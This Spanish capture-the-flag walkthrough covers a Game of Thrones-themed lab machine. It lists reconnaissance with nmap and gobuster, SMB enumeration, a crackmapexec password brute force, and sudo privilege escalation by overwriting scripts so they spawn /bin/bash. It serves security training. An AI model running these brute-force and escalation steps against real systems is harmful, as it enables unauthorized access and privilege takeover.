Winterfell
✍️ Autor: Zunderrub🔍 Dificultad: Fácil 📅 Fecha de creación: 16/07/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más. También tenemos un servicio SMB.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 172.17.0.2
para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web ambientada en la serie de Juego de Tronos.
Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Descubrimos un directorio que nos llama la atención que es /dragon
.


Vamos a indagar si tenemos acceso al servicio SMB.
smbclient -L 172.17.0.2

Vamos a descubrir usuarios válidos para SMB.
enum4linux 172.17.0.2

🚀 EXPLOTACIÓN
Hemos descubierto un usuario jon. Teniendo en cuenta que la máquina trata de la serie posiblemente sea algún título una contraseña por lo que lo copiamos en un archivo y hacemos fuerza bruta.
crackmapexec smb 172.17.0.2 -u jon -p titulos.txt

Con esas credenciales descubiertas nos conectamos a SMB.
smbclient \\\\172.17.0.2\\shared -U jon

Mostramos el contenido del archivo.

Decodificamos la contraseña que está en base64.
echo "aGlqb2RlbGFuaXN0ZXI=" | base64 -d

Nos conectamos con esas credenciales al usuario jon.
ssh jon@172.17.0.2

🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Lo que hacemos es borrar el archivo y crear lo mismo pero con un contenido para tener una shell.
rm .mensaje.py
nano /home/jon/.mensaje.py
import os
os.system('/bin/bash')
sudo -u aria /usr/bin/python3 /home/jon/.mensaje.py

Los binarios que tenemos a nuestra disposición nos permiten leer y listar archivos que pertenecen a Daenerys. Por lo tanto, podemos suponer que uno de los pasos a seguir es explorar algún archivo en su directorio home. Primero, listamos el contenido del directorio y encontramos un archivo llamado mensajeParajon
, que podría ser relevante para nuestras acciones.
sudo -u daenerys ls /home/daenerys
sudo -u daenerys cat /home/daenerys/mensajeParaJon

Nos logueamos con daenerys con la contraseña descubierta.

Lo primero que hacemos es leer el archivo y descubrimos que es un script en bash que establece una conexión con otra dirección IP. Sin embargo, al revisar los permisos, notamos que tenemos acceso a él. Por lo tanto, para escalar privilegios, solo necesitamos editar el archivo.
#!/bin/bash
bash
Ejecutamos.
sudo /usr/bin/bash /home/daenerys/.secret/.shell.sh

Last updated
Was this helpful?